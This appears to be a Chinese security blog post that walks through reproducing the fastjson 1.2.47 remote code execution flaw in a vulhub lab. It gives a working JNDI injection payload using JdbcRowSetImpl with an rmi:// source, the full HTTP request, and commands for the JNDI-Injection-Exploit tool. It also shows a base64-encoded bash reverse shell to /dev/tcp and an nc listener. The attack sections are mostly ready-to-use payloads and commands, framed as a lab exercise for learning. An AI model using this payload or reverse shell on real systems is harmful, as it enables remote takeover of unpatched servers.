漏洞复现-fastjson 1.2.47-rce

admin 2023年2月8日11:23:21评论39 views字数 1788阅读5分57秒阅读模式

免责声明

本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。

漏洞概述

fastjson< =1.2.47 的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意命令。

靶场环境

vulhub搭建参考:

Vulnhub 靶场环境搭建

进入到vulbub靶场的/vulhub/fastjson/1.2.47-rce目录

使用命令:

docker-compose up -d #启动镜像,整个过程比较久,耐心等待
环境搭建完毕,访问http://192.168.0.140:8090/,得到如下页面

漏洞复现-fastjson 1.2.47-rce

验证漏洞的存在

访问http://192.168.0.140:8090 抓包,修改数据包,就可以更新服务器端的信息

GET修改成POST,再添加

Content-Type:application/json{"name":"alsly","age":20}

漏洞复现-fastjson 1.2.47-rce


命令执行

1、利用工具自动开启RMI和LDAP服务以及发布Exploit类

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "要执行的命令" -A "vpsip"java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/access" -A "192.168.0.1"

漏洞复现-fastjson 1.2.47-rce

2、构造数据包,发送payload

漏洞复现-fastjson 1.2.47-rce

漏洞复现-fastjson 1.2.47-rce

2、进入终端,查看文件是否生成(确认命令正常执行)

1)进入终端

docker psdocker exec -it 容器id bashdocker exec -it cdb842d6e03c bash

漏洞复现-fastjson 1.2.47-rce

2)查看是否存在创建的文件,存在!

漏洞复现-fastjson 1.2.47-rce

反弹shell


1)构造命令,反弹shell

bash -i >& /dev/tcp/192.168.0.128/6666 0>&1-> YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTI4LzY2NjYgMD4mMQ==  #base64编码java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTI4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.0.1"

漏洞复现-fastjson 1.2.47-rce

2)开启监听

nc -lvvp 6666

漏洞复现-fastjson 1.2.47-rce

3)构造数据包,发送payload

POST / HTTP/1.1Host: 192.168.0.140:8090User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Content-Type:application/jsonAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Length: 266

{ "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://192.168.0.1:1099/dab1pj", "autoCommit":true }}

漏洞复现-fastjson 1.2.47-rce

4)等待片刻,获得反弹shell

漏洞复现-fastjson 1.2.47-rce

获取exp

关注浪飒sec回复221213获取exp下载地址

漏洞复现-fastjson 1.2.47-rce

历史推荐

漏洞复现-CVE-2016-4437

漏洞复现-fastjson 1.2.24-rce

漏洞复现-Tomcat8弱口令&&后台Getshell

漏洞复现——CVE-2021-44228

漏洞复现——php inclusion

漏洞复现——CVE-2017-5645

原文始发于微信公众号(浪飒sec):漏洞复现-fastjson 1.2.47-rce

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月8日11:23:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-fastjson 1.2.47-rcehttp://cn-sec.com/archives/1542712.html

发表评论

匿名网友 填写信息